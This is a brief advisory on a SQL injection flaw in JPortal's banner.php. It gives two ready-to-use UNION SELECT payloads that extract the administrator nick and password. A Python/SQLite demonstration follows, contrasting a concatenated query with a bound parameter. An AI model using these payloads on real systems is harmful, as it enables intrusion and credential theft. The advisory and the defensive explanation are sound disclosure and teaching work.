JPortal Banner.PHP SQL Injection Vulnerability
No exploit is required. The following demonstrates the steps necessary to obtain the administrator login id and password:

Go to http://www.example.com/jportal/banner.php and try this:

    ' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1

and then:

    ' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1
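Why the quoted input works against a query built by string concatenation, and why a bound parameter stops it, shown as an added example that is not JPortal's code. It uses an in-memory SQLite database; the `banners` table, its column names, the `banner_id` argument and all row values are constructed, and only `admins`, `nick` and `pass` come from the text above.

```python
import sqlite3

# First of the two inputs quoted in the advisory, copied as-is.
PAYLOAD = ("' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL, "
           "NULL, NULL, NULL, NULL, NULL from admins where '1=1")


def make_db():
    """Build a constructed stand-in schema for the demonstration."""
    # Both arms of a UNION must have the same width, so the hypothetical
    # banners table gets as many columns as the quoted SELECT list.
    ncols = PAYLOAD.split(" from ")[0].count(",") + 1
    db = sqlite3.connect(":memory:")
    extra = ", ".join(f"c{i}" for i in range(1, ncols))
    db.execute(f"CREATE TABLE banners (id TEXT, {extra})")
    db.execute("INSERT INTO banners (id, c1) VALUES ('7', 'ad.gif')")
    db.execute("CREATE TABLE admins (nick TEXT, pass TEXT)")
    # Constructed sample credentials, not real data.
    db.execute("INSERT INTO admins VALUES ('admin-sample', 'constructed-hash')")
    return db


def lookup_concatenated(db, banner_id):
    """Vulnerable pattern: the value becomes part of the SQL text."""
    sql = "SELECT * FROM banners WHERE id='" + banner_id + "'"
    return db.execute(sql).fetchall()


def lookup_bound(db, banner_id):
    """Hardened pattern: the value is bound and only ever compared as data."""
    return db.execute("SELECT * FROM banners WHERE id=?", (banner_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_concatenated(db, PAYLOAD))
    print("bound:       ", lookup_bound(db, PAYLOAD))
    print("bound, id 7: ", lookup_bound(db, "7"))
```

In the concatenated query the leading quote closes the string literal and the trailing `'1=1` is closed by the application's own final quote, so the admins row is returned in place of a banner; with the bound parameter the same input is just an id that matches nothing.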